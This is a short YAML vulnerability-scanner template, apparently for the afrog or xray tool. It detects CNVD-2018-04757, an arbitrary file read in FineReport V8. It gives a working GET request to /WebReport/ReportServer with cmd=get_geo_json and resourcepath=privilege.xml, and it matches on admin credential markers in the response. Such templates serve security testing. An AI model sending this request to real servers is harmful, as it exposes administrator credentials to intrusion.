id: CNVD-2018-04757

info:
  name: 帆软报表 V8 get_geo_json 任意文件读取漏洞
  author: zan8in
  severity: critical
  description: |
    FineReport报表软件是一款纯Java编写的，集数据展示(报表)和数据录入(表单)功能于一身的企业级web报表工具。
    FineReport v8.0版本存在任意文件读取漏洞，攻击者可利用漏洞读取网站任意文件
    body="isSupportForgetPwd"
  reference:
    - http://wiki.peiqi.tech/wiki/oa/%E5%B8%86%E8%BD%AFOA/%E5%B8%86%E8%BD%AF%E6%8A%A5%E8%A1%A8%20V8%20get_geo_json%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%20CNVD-2018-04757.html

rules:
  r0:
    request:
      method: GET
      path: /WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
    expression: response.status == 200 && response.body.bcontains(b'<![CDATA[admin]]') && response.body.bcontains(b'op=fr_platform]]>') && response.body.bcontains(b'PrivilegeManager')
expression: r0()